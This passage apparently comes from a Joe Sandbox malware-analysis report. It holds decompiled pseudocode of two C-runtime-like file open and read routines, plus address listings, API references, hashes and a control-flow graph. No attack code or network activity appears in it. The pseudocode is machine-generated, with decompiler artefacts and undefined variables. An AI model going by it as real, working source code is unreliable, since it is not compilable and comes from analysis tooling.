                                                          				_t191 = 6;
                                                          				memcpy( &_v52, _t263, _t191 << 2);
                                                          				_t275 = _t273 + 0x1c;
                                                          				_t249 = _t263 + _t191 + _t191;
                                                          				_t264 = _t263 | 0xffffffff;
                                                          				if(_v40 != _t264) {
                                                          					_t114 = E0040A20F(_t188, _t249, _t264, __eflags);
                                                          					_t189 = _a8;
                                                          					 *_t189 = _t114;
                                                          					__eflags = _t114 - _t264;
                                                          					if(_t114 != _t264) {
                                                          						_v24 = _v24 & 0x00000000;
                                                          						_v28 = 0xc;
                                                          						_t276 = _t275 - 0x18;
                                                          						 *_a4 = 1;
                                                          						_push(6);
                                                          						_v20 =  !(_a16 >> 7) & 1;
                                                          						_push( &_v28);
                                                          						_push(_a12);
                                                          						memcpy(_t276,  &_v52, 1 << 2);
                                                          						_t196 = 0;
                                                          						_t122 = E0040C070(); // executed
                                                          						_t253 = _t122;
                                                          						_t278 = _t276 + 0x2c;
                                                          						_v12 = _t253;
                                                          						__eflags = _t253 - 0xffffffff;
                                                          						if(_t253 != 0xffffffff) {
                                                          							L11:
                                                          							_t123 = GetFileType(_t253); // executed
                                                          							__eflags = _t123;
                                                          							if(_t123 != 0) {
                                                          								__eflags = _t123 - 2;
                                                          								if(_t123 != 2) {
                                                          									__eflags = _t123 - 3;
                                                          									_t124 = _v52;
                                                          									if(_t123 == 3) {
                                                          										_t124 = _t124 | 0x00000008;
                                                          										__eflags = _t124;
                                                          									}
                                                          								} else {
                                                          									_t124 = _v52 | 0x00000040;
                                                          								}
                                                          								_v5 = _t124;
                                                          								E0040A15A(_t196,  *_t189, _t253);
                                                          								_t241 = _v5 | 0x00000001;
                                                          								_v16 = _t241;
                                                          								_v52 = _t241;
                                                          								 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
                                                          								_t202 =  *_t189;
                                                          								_t204 = (_t202 & 0x0000003f) * 0x38;
                                                          								__eflags = _a16 & 0x00000002;
                                                          								 *((char*)( *((intOrPtr*)(0x418ec0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
                                                          								if((_a16 & 0x00000002) == 0) {
                                                          									L22:
                                                          									_v5 = 0;
                                                          									_push( &_v5);
                                                          									_push(_a16);
                                                          									_t279 = _t278 - 0x18;
                                                          									_t205 = 6;
                                                          									_push( *_t189);
                                                          									memcpy(_t279,  &_v52, _t205 << 2);
                                                          									_t134 = E0040BE1A(_t189,  &_v52 + _t205 + _t205,  &_v52);
                                                          									_t242 =  *_t189;
                                                          									_t267 = _t134;
                                                          									_t281 = _t279 + 0x30;
                                                          									__eflags = _t267;
                                                          									if(_t267 == 0) {
                                                          										 *((char*)( *((intOrPtr*)(0x418ec0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
                                                          										 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
                                                          										__eflags = _v16 & 0x00000048;
                                                          										if((_v16 & 0x00000048) == 0) {
                                                          											__eflags = _a16 & 0x00000008;
                                                          											if((_a16 & 0x00000008) != 0) {
                                                          												_t224 =  *_t189;
                                                          												_t226 = (_t224 & 0x0000003f) * 0x38;
                                                          												_t162 =  *((intOrPtr*)(0x418ec0 + (_t224 >> 6) * 4));
                                                          												_t87 = _t162 + _t226 + 0x28;
                                                          												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
                                                          												__eflags =  *_t87;
                                                          											}
                                                          										}
                                                          										_t268 = _v48;
                                                          										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
                                                          										if((_t268 & 0xc0000000) != 0xc0000000) {
                                                          											L32:
                                                          											__eflags = 0;
                                                          											return 0;
                                                          										} else {
                                                          											__eflags = _a16 & 0x00000001;
                                                          											if((_a16 & 0x00000001) == 0) {
                                                          												goto L32;
                                                          											}
                                                          											CloseHandle(_v12);
                                                          											_v48 = _t268 & 0x7fffffff;
                                                          											_t214 = 6;
                                                          											_push( &_v28);
                                                          											_push(_a12);
                                                          											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
                                                          											_t246 = E0040C070();
                                                          											__eflags = _t246 - 0xffffffff;
                                                          											if(_t246 != 0xffffffff) {
                                                          												_t216 =  *_t189;
                                                          												_t218 = (_t216 & 0x0000003f) * 0x38;
                                                          												__eflags = _t218;
                                                          												 *((intOrPtr*)( *((intOrPtr*)(0x418ec0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
                                                          												goto L32;
                                                          											}
                                                          											E00407B10(GetLastError());
                                                          											 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
                                                          											E0040A322( *_t189);
                                                          											L10:
                                                          											goto L2;
                                                          										}
                                                          									}
                                                          									_push(_t242);
                                                          									goto L21;
                                                          								} else {
                                                          									_t267 = E0040C27F(_t204,  *_t189);
                                                          									__eflags = _t267;
                                                          									if(_t267 == 0) {
                                                          										goto L22;
                                                          									}
                                                          									_push( *_t189);
                                                          									L21:
                                                          									E0040E6A0();
                                                          									return _t267;
                                                          								}
                                                          							}
                                                          							_t271 = GetLastError();
                                                          							E00407B10(_t271);
                                                          							 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
                                                          							CloseHandle(_t253);
                                                          							__eflags = _t271;
                                                          							if(_t271 == 0) {
                                                          								 *((intOrPtr*)(E00407B6A())) = 0xd;
                                                          							}
                                                          							goto L2;
                                                          						}
                                                          						_t233 = _v48;
                                                          						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
                                                          						if((_t233 & 0xc0000000) != 0xc0000000) {
                                                          							L9:
                                                          							_t234 =  *_t189;
                                                          							_t236 = (_t234 & 0x0000003f) * 0x38;
                                                          							_t178 =  *((intOrPtr*)(0x418ec0 + (_t234 >> 6) * 4));
                                                          							_t33 = _t178 + _t236 + 0x28;
                                                          							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
                                                          							__eflags =  *_t33;
                                                          							E00407B10(GetLastError());
                                                          							goto L10;
                                                          						}
                                                          						__eflags = _a16 & 0x00000001;
                                                          						if((_a16 & 0x00000001) == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_t285 = _t278 - 0x18;
                                                          						_v48 = _t233 & 0x7fffffff;
                                                          						_t238 = 6;
                                                          						_push( &_v28);
                                                          						_push(_a12);
                                                          						memcpy(_t285,  &_v52, _t238 << 2);
                                                          						_t196 = 0;
                                                          						_t253 = E0040C070();
                                                          						_t278 = _t285 + 0x2c;
                                                          						_v12 = _t253;
                                                          						__eflags = _t253 - 0xffffffff;
                                                          						if(_t253 != 0xffffffff) {
                                                          							goto L11;
                                                          						}
                                                          						goto L9;
                                                          					} else {
                                                          						 *(E00407B57()) =  *_t184 & 0x00000000;
                                                          						 *_t189 = _t264;
                                                          						 *((intOrPtr*)(E00407B6A())) = 0x18;
                                                          						goto L2;
                                                          					}
                                                          				} else {
                                                          					 *(E00407B57()) =  *_t186 & 0x00000000;
                                                          					 *_a8 = _t264;
                                                          					L2:
                                                          					return  *((intOrPtr*)(E00407B6A()));
                                                          				}
                                                          			}
























































                                                          0x0040c3da
                                                          0x0040c3de
                                                          0x0040c3df
                                                          0x0040c3df
                                                          0x0040c3df
                                                          0x0040c3e1
                                                          0x0040c3e7
                                                          0x0040c402
                                                          0x0040c407
                                                          0x0040c40a
                                                          0x0040c40c
                                                          0x0040c40e
                                                          0x0040c42d
                                                          0x0040c434
                                                          0x0040c43b
                                                          0x0040c43e
                                                          0x0040c44a
                                                          0x0040c44d
                                                          0x0040c455
                                                          0x0040c456
                                                          0x0040c459
                                                          0x0040c459
                                                          0x0040c45b
                                                          0x0040c460
                                                          0x0040c462
                                                          0x0040c465
                                                          0x0040c46d
                                                          0x0040c470
                                                          0x0040c4dd
                                                          0x0040c4de
                                                          0x0040c4e4
                                                          0x0040c4e6
                                                          0x0040c52f
                                                          0x0040c532
                                                          0x0040c53b
                                                          0x0040c53e
                                                          0x0040c541
                                                          0x0040c543
                                                          0x0040c543
                                                          0x0040c543
                                                          0x0040c534
                                                          0x0040c537
                                                          0x0040c537
                                                          0x0040c548
                                                          0x0040c54b
                                                          0x0040c557
                                                          0x0040c55c
                                                          0x0040c568
                                                          0x0040c572
                                                          0x0040c576
                                                          0x0040c580
                                                          0x0040c583
                                                          0x0040c58e
                                                          0x0040c593
                                                          0x0040c5b2
                                                          0x0040c5b5
                                                          0x0040c5b9
                                                          0x0040c5ba
                                                          0x0040c5c0
                                                          0x0040c5c5
                                                          0x0040c5c8
                                                          0x0040c5ca
                                                          0x0040c5cc
                                                          0x0040c5d1
                                                          0x0040c5d3
                                                          0x0040c5d5
                                                          0x0040c5d8
                                                          0x0040c5da
                                                          0x0040c5f4
                                                          0x0040c618
                                                          0x0040c61c
                                                          0x0040c620
                                                          0x0040c622
                                                          0x0040c626
                                                          0x0040c628
                                                          0x0040c632
                                                          0x0040c635
                                                          0x0040c63c
                                                          0x0040c63c
                                                          0x0040c63c
                                                          0x0040c63c
                                                          0x0040c626
                                                          0x0040c641
                                                          0x0040c64d
                                                          0x0040c64f
                                                          0x0040c6da
                                                          0x0040c6da
                                                          0x00000000
                                                          0x0040c655
                                                          0x0040c655
                                                          0x0040c659
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c65e
                                                          0x0040c670
                                                          0x0040c678
                                                          0x0040c67b
                                                          0x0040c67c
                                                          0x0040c67f
                                                          0x0040c686
                                                          0x0040c68b
                                                          0x0040c68e
                                                          0x0040c6c2
                                                          0x0040c6cc
                                                          0x0040c6cc
                                                          0x0040c6d6
                                                          0x00000000
                                                          0x0040c6d6
                                                          0x0040c697
                                                          0x0040c6b0
                                                          0x0040c6b7
                                                          0x0040c4d7
                                                          0x00000000
                                                          0x0040c4d7
                                                          0x0040c64f
                                                          0x0040c5dc
                                                          0x00000000
                                                          0x0040c595
                                                          0x0040c59c
                                                          0x0040c59f
                                                          0x0040c5a1
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c5a3
                                                          0x0040c5a5
                                                          0x0040c5a5
                                                          0x00000000
                                                          0x0040c5ab
                                                          0x0040c593
                                                          0x0040c4ee
                                                          0x0040c4f1
                                                          0x0040c50c
                                                          0x0040c511
                                                          0x0040c517
                                                          0x0040c519
                                                          0x0040c524
                                                          0x0040c524
                                                          0x00000000
                                                          0x0040c519
                                                          0x0040c472
                                                          0x0040c479
                                                          0x0040c47b
                                                          0x0040c4b2
                                                          0x0040c4b2
                                                          0x0040c4bc
                                                          0x0040c4bf
                                                          0x0040c4c6
                                                          0x0040c4c6
                                                          0x0040c4c6
                                                          0x0040c4d2
                                                          0x00000000
                                                          0x0040c4d2
                                                          0x0040c47d
                                                          0x0040c481
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c483
                                                          0x0040c492
                                                          0x0040c497
                                                          0x0040c49a
                                                          0x0040c49b
                                                          0x0040c49e
                                                          0x0040c49e
                                                          0x0040c4a5
                                                          0x0040c4a7
                                                          0x0040c4aa
                                                          0x0040c4ad
                                                          0x0040c4b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040c410
                                                          0x0040c415
                                                          0x0040c418
                                                          0x0040c41f
                                                          0x00000000
                                                          0x0040c41f
                                                          0x0040c3e9
                                                          0x0040c3ee
                                                          0x0040c3f4
                                                          0x0040c3f6
                                                          0x00000000
                                                          0x0040c3fb

                                                          APIs
                                                            • Part of subcall function 0040C070: CreateFileW.KERNELBASE(?,00000000,?,0040C460,?,?,00000000,?,0040C460,?,0000000C), ref: 0040C08D
                                                          • GetLastError.KERNEL32 ref: 0040C4CB
                                                          • __dosmaperr.LIBCMT ref: 0040C4D2
                                                          • GetFileType.KERNELBASE(00000000), ref: 0040C4DE
                                                          • GetLastError.KERNEL32 ref: 0040C4E8
                                                          • __dosmaperr.LIBCMT ref: 0040C4F1
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C511
                                                          • CloseHandle.KERNEL32(00407F4C), ref: 0040C65E
                                                          • GetLastError.KERNEL32 ref: 0040C690
                                                          • __dosmaperr.LIBCMT ref: 0040C697
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.316635019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.316628734.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316670602.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.316687505.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: 02834435bf5dd621a605c359c7cb1ccf834e235c87be511bd0bf7476f94e693c
                                                          • Instruction ID: 74d71066eb577f9082b26780235b5dbbe16e0fe86ef76fded194978a4361ce27
                                                          • Opcode Fuzzy Hash: 02834435bf5dd621a605c359c7cb1ccf834e235c87be511bd0bf7476f94e693c
                                                          • Instruction Fuzzy Hash: FEA11532E141549FCF199F68DC91BAE3BA1AB06314F14426EF811BB3D1CB399852CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 69 407550-407560 70 407562-407575 call 407b57 call 407b6a 69->70 71 40757a-40757c 69->71 87 4078d4 70->87 73 407582-407588 71->73 74 4078bc-4078c9 call 407b57 call 407b6a 71->74 73->74 77 40758e-4075b7 73->77 92 4078cf call 406567 74->92 77->74 80 4075bd-4075c6 77->80 83 4075e0-4075e2 80->83 84 4075c8-4075db call 407b57 call 407b6a 80->84 85 4078b8-4078ba 83->85 86 4075e8-4075ec 83->86 84->92 91 4078d7-4078da 85->91 86->85 90 4075f2-4075f6 86->90 87->91 90->84 94 4075f8-40760f 90->94 92->87 97 407611-407614 94->97 98 407644-40764a 94->98 100 407616-40761c 97->100 101 40763a-407642 97->101 102 40764c-407653 98->102 103 40761e-407635 call 407b57 call 407b6a call 406567 98->103 100->101 100->103 107 4076b7-4076d6 101->107 104 407655 102->104 105 407657-407675 call 40a6a3 call 408694 * 2 102->105 134 4077ef 103->134 104->105 139 407692-4076b5 call 4068d4 105->139 140 407677-40768d call 407b6a call 407b57 105->140 108 407792-40779b call 40bb62 107->108 109 4076dc-4076e8 107->109 123 40780c 108->123 124 40779d-4077af 108->124 109->108 112 4076ee-4076f0 109->112 112->108 116 4076f6-407717 112->116 116->108 120 407719-40772f 116->120 120->108 125 407731-407733 120->125 127 407810-407826 ReadFile 123->127 124->123 129 4077b1-4077c0 GetConsoleMode 124->129 125->108 130 407735-407758 125->130 132 407884-40788f GetLastError 127->132 133 407828-40782e 127->133 129->123 135 4077c2-4077c6 129->135 130->108 138 40775a-407770 130->138 141 407891-4078a3 call 407b6a call 407b57 132->141 142 4078a8-4078ab 132->142 133->132 143 407830 133->143 137 4077f2-4077fc call 408694 134->137 135->127 136 4077c8-4077e0 ReadConsoleW 135->136 144 407801-40780a 136->144 145 4077e2 GetLastError 136->145 137->91 138->108 149 407772-407774 138->149 139->107 140->134 141->134 146 4078b1-4078b3 142->146 147 4077e8-4077ee call 407b10 142->147 153 407833-407845 143->153 144->153 145->147 146->137 147->134 149->108 156 407776-40778d 149->156 153->137 160 407847-40784b 153->160 156->108 161 407864-407871 160->161 162 40784d-40785d call 407262 160->162 168 407873 call 4073b9 161->168 169 40787d-407882 call 4070a8 161->169 174 407860-407862 162->174 175 407878-40787b 168->175 169->175 174->137 175->174
                                                          C-Code - Quality: 78%
                                                          			E00407550(signed int _a4, void* _a8, unsigned int _a12) {
                                                          				signed int _v5;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				signed int _v20;
                                                          				void* _v24;
                                                          				long _v28;
                                                          				char _v32;
                                                          				void* _v36;
                                                          				long _v40;
                                                          				signed int* _t127;
                                                          				signed int _t129;
                                                          				signed int _t130;
                                                          				intOrPtr _t133;
                                                          				signed int _t136;
                                                          				signed int _t138;
                                                          				signed char _t140;
                                                          				intOrPtr _t148;
                                                          				long _t150;
                                                          				signed int _t151;
                                                          				signed int _t152;
                                                          				signed int _t154;
                                                          				long _t155;
                                                          				intOrPtr _t160;
                                                          				signed int _t161;
                                                          				intOrPtr _t163;
                                                          				signed int _t165;
                                                          				signed int _t167;
                                                          				char _t169;
                                                          				char _t174;
                                                          				char _t179;
                                                          				signed char _t186;
                                                          				long _t192;
                                                          				signed int _t196;
                                                          				signed char _t197;
                                                          				signed int _t198;
                                                          				long _t200;
                                                          				intOrPtr _t202;
                                                          				void* _t203;
                                                          				unsigned int _t206;
                                                          				signed int _t208;
                                                          				char* _t210;
                                                          				char* _t211;
                                                          				char* _t212;
                                                          				signed int _t215;
                                                          				long _t216;
                                                          				signed int _t217;
                                                          				signed int _t218;
                                                          				signed int _t225;
                                                          				signed int _t226;
                                                          				void* _t230;
                                                          				void* _t232;
                                                          				void* _t233;
                                                          				void* _t234;
                                                          
                                                          				_t215 = _a4;
                                                          				_t233 = _t232 - 0x24;
                                                          				if(_t215 != 0xfffffffe) {
                                                          					__eflags = _t215;
                                                          					if(_t215 < 0) {
                                                          						L58:
                                                          						_t127 = E00407B57();
                                                          						 *_t127 =  *_t127 & 0x00000000;
                                                          						__eflags =  *_t127;
                                                          						 *((intOrPtr*)(E00407B6A())) = 9;
                                                          						L59:
                                                          						_t129 = E00406567();
                                                          						goto L60;
                                                          					}
                                                          					__eflags = _t215 -  *0x4190c0; // 0x40
                                                          					if(__eflags >= 0) {
                                                          						goto L58;
                                                          					}
                                                          					_t196 = _t215 >> 6;
                                                          					_t225 = (_t215 & 0x0000003f) * 0x38;
                                                          					_v12 = _t196;
                                                          					_v32 = 1;
                                                          					_t133 =  *((intOrPtr*)(0x418ec0 + _t196 * 4));
                                                          					_v20 = _t225;
                                                          					_t197 =  *((intOrPtr*)(_t225 + _t133 + 0x28));
                                                          					_v5 = _t197;
                                                          					__eflags = 1 & _t197;
                                                          					if((1 & _t197) == 0) {
                                                          						goto L58;
                                                          					}
                                                          					_t198 = _a12;
                                                          					__eflags = _t198 - 0x7fffffff;
                                                          					if(_t198 <= 0x7fffffff) {
                                                          						__eflags = _t198;
                                                          						if(_t198 == 0) {
                                                          							L57:
                                                          							_t130 = 0;
                                                          							goto L61;
                                                          						}
                                                          						__eflags = _v5 & 0x00000002;
                                                          						if((_v5 & 0x00000002) != 0) {
                                                          							goto L57;
                                                          						}
                                                          						__eflags = _a8;
                                                          						if(_a8 == 0) {
                                                          							goto L6;
                                                          						}
                                                          						_t136 =  *((intOrPtr*)(_t225 + _t133 + 0x29));
                                                          						_v5 = _t136;
                                                          						_v24 =  *((intOrPtr*)(_t225 + _t133 + 0x18));
                                                          						_t230 = 0;
                                                          						_t138 = _t136 - 1;
                                                          						__eflags = _t138;
                                                          						if(_t138 == 0) {
                                                          							_t140 =  !_t198;
                                                          							__eflags = 1 & _t140;
                                                          							if((1 & _t140) == 0) {
                                                          								L13:
                                                          								 *(E00407B57()) =  *_t141 & _t230;
                                                          								 *((intOrPtr*)(E00407B6A())) = 0x16;
                                                          								E00406567();
                                                          								goto L38;
                                                          							} else {
                                                          								_t200 = _t198 >> 1;
                                                          								_t192 = 4;
                                                          								__eflags = _t200 - 1;
                                                          								if(_t200 >= 1) {
                                                          									_t192 = _t200;
                                                          								}
                                                          								_t230 = E0040A6A3(_t192);
                                                          								E00408694(0);
                                                          								E00408694(0);
                                                          								_t234 = _t233 + 0xc;
                                                          								_v16 = _t230;
                                                          								__eflags = _t230;
                                                          								if(_t230 != 0) {
                                                          									_t148 = E004068D4(_t215, _a4, 0, 0, 1);
                                                          									_t233 = _t234 + 0x10;
                                                          									_t202 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
                                                          									 *((intOrPtr*)(_t225 + _t202 + 0x20)) = _t148;
                                                          									 *(_t225 + _t202 + 0x24) = _t215;
                                                          									_t203 = _t230;
                                                          									L21:
                                                          									_t225 = 0;
                                                          									_v36 = _t203;
                                                          									_t150 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
                                                          									_v28 = _t150;
                                                          									_t216 = _t150;
                                                          									_t151 = _v20;
                                                          									__eflags =  *(_t151 + _t216 + 0x28) & 0x00000048;
                                                          									_t217 = _a4;
                                                          									if(( *(_t151 + _t216 + 0x28) & 0x00000048) != 0) {
                                                          										_t169 =  *((intOrPtr*)(_t151 + _v28 + 0x2a));
                                                          										_t210 = _v16;
                                                          										__eflags = _t169 - 0xa;
                                                          										if(_t169 != 0xa) {
                                                          											__eflags = _t192;
                                                          											if(_t192 != 0) {
                                                          												_t225 = 1;
                                                          												 *_t210 = _t169;
                                                          												_t211 = _t210 + 1;
                                                          												_t192 = _t192 - 1;
                                                          												__eflags = _v5;
                                                          												_v16 = _t211;
                                                          												 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2a)) = 0xa;
                                                          												_t217 = _a4;
                                                          												if(_v5 != 0) {
                                                          													_t174 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2b));
                                                          													_t217 = _a4;
                                                          													__eflags = _t174 - 0xa;
                                                          													if(_t174 != 0xa) {
                                                          														__eflags = _t192;
                                                          														if(_t192 != 0) {
                                                          															 *_t211 = _t174;
                                                          															_t212 = _t211 + 1;
                                                          															_t192 = _t192 - 1;
                                                          															__eflags = _v5 - 1;
                                                          															_v16 = _t212;
                                                          															_t225 = 2;
                                                          															 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2b)) = 0xa;
                                                          															_t217 = _a4;
                                                          															if(_v5 == 1) {
                                                          																_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2c));
                                                          																_t217 = _a4;
                                                          																__eflags = _t179 - 0xa;
                                                          																if(_t179 != 0xa) {
                                                          																	__eflags = _t192;
                                                          																	if(_t192 != 0) {
                                                          																		 *_t212 = _t179;
                                                          																		_t192 = _t192 - 1;
                                                          																		__eflags = _t192;
                                                          																		_v16 = _t212 + 1;
                                                          																		_t225 = 3;
                                                          																		 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2c)) = 0xa;
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          									_t152 = E0040BB62(_t217);
                                                          									__eflags = _t152;
                                                          									if(_t152 == 0) {
                                                          										L41:
                                                          										_v32 = 0;
                                                          										L42:
                                                          										_t193 = _v16;
                                                          										_t154 = ReadFile(_v24, _v16, _t192,  &_v28, 0); // executed
                                                          										__eflags = _t154;
                                                          										if(_t154 == 0) {
                                                          											L53:
                                                          											_t155 = GetLastError();
                                                          											_t225 = 5;
                                                          											__eflags = _t155 - _t225;
                                                          											if(_t155 != _t225) {
                                                          												__eflags = _t155 - 0x6d;
                                                          												if(_t155 != 0x6d) {
                                                          													L37:
                                                          													E00407B10(_t155);
                                                          													goto L38;
                                                          												}
                                                          												_t226 = 0;
                                                          												goto L39;
                                                          											}
                                                          											 *((intOrPtr*)(E00407B6A())) = 9;
                                                          											 *(E00407B57()) = _t225;
                                                          											goto L38;
                                                          										}
                                                          										_t206 = _a12;
                                                          										__eflags = _v28 - _t206;
                                                          										if(_v28 > _t206) {
                                                          											goto L53;
                                                          										}
                                                          										_t226 = _t225 + _v28;
                                                          										__eflags = _t226;
                                                          										L45:
                                                          										_t218 = _v20;
                                                          										_t160 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
                                                          										__eflags =  *((char*)(_t218 + _t160 + 0x28));
                                                          										if( *((char*)(_t218 + _t160 + 0x28)) < 0) {
                                                          											__eflags = _v5 - 2;
                                                          											if(_v5 == 2) {
                                                          												__eflags = _v32;
                                                          												_push(_t226 >> 1);
                                                          												_push(_v36);
                                                          												_push(_a4);
                                                          												if(_v32 == 0) {
                                                          													_t161 = E004070A8();
                                                          												} else {
                                                          													_t161 = E004073B9(_t206);
                                                          												}
                                                          											} else {
                                                          												_t207 = _t206 >> 1;
                                                          												__eflags = _t206 >> 1;
                                                          												_t161 = E00407262(_t206 >> 1, _t206 >> 1, _a4, _t193, _t226, _a8, _t207);
                                                          											}
                                                          											_t226 = _t161;
                                                          										}
                                                          										goto L39;
                                                          									}
                                                          									_t208 = _v20;
                                                          									_t163 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
                                                          									__eflags =  *((char*)(_t208 + _t163 + 0x28));
                                                          									if( *((char*)(_t208 + _t163 + 0x28)) >= 0) {
                                                          										goto L41;
                                                          									}
                                                          									_t165 = GetConsoleMode(_v24,  &_v40);
                                                          									__eflags = _t165;
                                                          									if(_t165 == 0) {
                                                          										goto L41;
                                                          									}
                                                          									__eflags = _v5 - 2;
                                                          									if(_v5 != 2) {
                                                          										goto L42;
                                                          									}
                                                          									_t193 = _v16;
                                                          									_t167 = ReadConsoleW(_v24, _v16, _t192 >> 1,  &_v28, 0);
                                                          									__eflags = _t167;
                                                          									if(_t167 != 0) {
                                                          										_t206 = _a12;
                                                          										_t226 = _t225 + _v28 * 2;
                                                          										goto L45;
                                                          									}
                                                          									_t155 = GetLastError();
                                                          									goto L37;
                                                          								} else {
                                                          									 *((intOrPtr*)(E00407B6A())) = 0xc;
                                                          									 *(E00407B57()) = 8;
                                                          									L38:
                                                          									_t226 = _t225 | 0xffffffff;
                                                          									__eflags = _t226;
                                                          									L39:
                                                          									E00408694(_t230);
                                                          									_t130 = _t226;
                                                          									goto L61;
                                                          								}
                                                          							}
                                                          						}
                                                          						__eflags = _t138 != 1;
                                                          						if(_t138 != 1) {
                                                          							L14:
                                                          							_t192 = _t198;
                                                          							_t203 = _a8;
                                                          							_v16 = _t203;
                                                          							goto L21;
                                                          						}
                                                          						_t186 =  !_t198;
                                                          						__eflags = 1 & _t186;
                                                          						if((1 & _t186) != 0) {
                                                          							goto L14;
                                                          						}
                                                          						goto L13;
                                                          					}
                                                          					L6:
                                                          					 *(E00407B57()) =  *_t134 & 0x00000000;
                                                          					 *((intOrPtr*)(E00407B6A())) = 0x16;
                                                          					goto L59;
                                                          				} else {
                                                          					 *(E00407B57()) =  *_t187 & 0x00000000;
                                                          					_t129 = E00407B6A();
                                                          					 *_t129 = 9;
                                                          					L60:
                                                          					_t130 = _t129 | 0xffffffff;
                                                          					L61:
                                                          					return _t130;
                                                          				}
                                                          			}
























































                                                          0x00407555
                                                          0x00407558
                                                          0x00407560
                                                          0x0040757a
                                                          0x0040757c
                                                          0x004078bc
                                                          0x004078bc
                                                          0x004078c1
                                                          0x004078c1
                                                          0x004078c9
                                                          0x004078cf
                                                          0x004078cf
                                                          0x00000000
                                                          0x004078cf
                                                          0x00407582
                                                          0x00407588
                                                          0x00000000
                                                          0x00000000
                                                          0x00407592
                                                          0x00407598
                                                          0x0040759d
                                                          0x004075a1
                                                          0x004075a4
                                                          0x004075ab
                                                          0x004075ae
                                                          0x004075b2
                                                          0x004075b5
                                                          0x004075b7
                                                          0x00000000
                                                          0x00000000
                                                          0x004075bd
                                                          0x004075c0
                                                          0x004075c6
                                                          0x004075e0
                                                          0x004075e2
                                                          0x004078b8
                                                          0x004078b8
                                                          0x00000000
                                                          0x004078b8
                                                          0x004075e8
                                                          0x004075ec
                                                          0x00000000
                                                          0x00000000
                                                          0x004075f2
                                                          0x004075f6
                                                          0x00000000
                                                          0x00000000
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407604
                                                          0x00407607
                                                          0x0040760c
                                                          0x0040760c
                                                          0x0040760f
                                                          0x00407646
                                                          0x00407648
                                                          0x0040764a
                                                          0x0040761e
                                                          0x00407623
                                                          0x0040762a
                                                          0x00407630
                                                          0x00000000
                                                          0x0040764c
                                                          0x0040764e
                                                          0x00407650
                                                          0x00407651
                                                          0x00407653
                                                          0x00407655
                                                          0x00407655
                                                          0x0040765f
                                                          0x00407661
                                                          0x00407668
                                                          0x0040766d
                                                          0x00407670
                                                          0x00407673
                                                          0x00407675
                                                          0x0040769b
                                                          0x004076a3
                                                          0x004076a6
                                                          0x004076ad
                                                          0x004076b1
                                                          0x004076b5
                                                          0x004076b7
                                                          0x004076ba
                                                          0x004076bc
                                                          0x004076bf
                                                          0x004076c6
                                                          0x004076c9
                                                          0x004076cb
                                                          0x004076ce
                                                          0x004076d3
                                                          0x004076d6
                                                          0x004076df
                                                          0x004076e3
                                                          0x004076e6
                                                          0x004076e8
                                                          0x004076ee
                                                          0x004076f0
                                                          0x004076f9
                                                          0x004076fa
                                                          0x004076fc
                                                          0x00407700
                                                          0x00407701
